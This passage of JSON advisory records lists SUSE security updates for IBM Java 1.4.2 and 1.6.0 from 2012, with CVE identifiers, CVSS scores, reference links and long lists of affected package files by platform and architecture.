href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556</a>\n >\n * CVE-2011-3557\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557</a>\n >\n * CVE-2011-3560\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560</a>\n >\n\n", "edition": 1, "reporter": "Suse", "published": "2012-02-23T22:08:13", "title": "Security update for IBM Java 1.4.2 (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3549", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3389", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552"], "modified": "2012-02-23T22:08:13", "id": "SUSE-SU-2012:0122-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-02/msg00019.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:23:19", "references": ["http://download.novell.com/patch/finder/?keywords=150456135775777ea73371c1398a948f", "https://bugzilla.novell.com/739248"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-alsa-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-alsa", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-alsa-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-alsa", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-alsa-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-alsa", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-alsa-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-alsa", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.s390x.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-fonts-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-fonts", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-plugin-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-plugin", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "i586", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.3.1.i586.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "ppc64", "packageFilename": "java-1_6_0-ibm-jdbc-1.6.0_sr10.0-0.3.1.ppc64.rpm", "packageName": "java-1_6_0-ibm-jdbc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit FOR SP2", "OSVersion": "11.1", "packageVersion": "1.6.0_sr10.0-0.3.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-1.6.0_sr10.0-0.3.1.x86_64.rpm", "packageName": "java-1_6_0-ibm", "operator": "lt"}], "description": "IBM Java 1.6.0 SR10 has been released fixing the following\n CVE's/security Issues:\n\n * CVE-2011-3389\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389</a>\n >\n * CVE-2011-3516\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3516\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3516</a>\n >\n * CVE-2011-3521\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521</a>\n >\n * CVE-2011-3544\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544</a>\n >\n * CVE-2011-3545\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3545</a>\n >\n * CVE-2011-3546\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3546\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3546</a>\n >\n * CVE-2011-3547\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547</a>\n >\n * CVE-2011-3548\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548</a>\n >\n * CVE-2011-3549\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3549</a>\n >\n * CVE-2011-3550\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3550\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3550</a>\n >\n * CVE-2011-3551\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551</a>\n >\n * CVE-2011-3552\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552</a>\n >\n * CVE-2011-3553\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553</a>\n >\n * CVE-2011-3554\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554</a>\n >\n * CVE-2011-3556\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556</a>\n >\n * CVE-2011-3557\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557</a>\n >\n * CVE-2011-3560\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560</a>\n >\n * CVE-2011-3561\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3561\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3561</a>\n >\n\n", "edition": 1, "reporter": "Suse", "published": "2012-03-06T21:08:29", "title": "Security update for IBM Java 1.6.0 (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3557", "CVE-2011-3551", "CVE-2011-3549", "CVE-2011-3561", "CVE-2011-3548", "CVE-2011-3547", "CVE-2011-3521", "CVE-2011-3389", "CVE-2011-3544", "CVE-2011-3553", "CVE-2011-3516", "CVE-2011-3546", "CVE-2011-3554", "CVE-2011-3556", "CVE-2011-3560", "CVE-2011-3545", "CVE-2011-3552", "CVE-2011-3550"], "modified": "2012-03-06T21:08:29", "id": "SUSE-SU-2012:0114-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-03/msg00001.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:43:05", "references": ["https://bugzilla.novell.com/739248", "http://download.novell.com/patch/finder/?keywords=ea376c01db551281b5801fde16acb03e"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "s390x", "packageFilename": "java-1_6_0-ibm-32bit-1.6.0_sr10.0-0.8.1.s390x.rpm", "packageName": "java-1_6_0-ibm-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Java", "OSVersion": "10.4", "packageVersion": "1.6.0_sr10.0-0.8.1", "arch": "x86_64", "packageFilename": "java-1_6_0-ibm-devel-1.6.0_sr10.0-0.8.1.x86_64.rpm", "packageName": "java-1_6_0-ibm-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.4", "packageVersion": 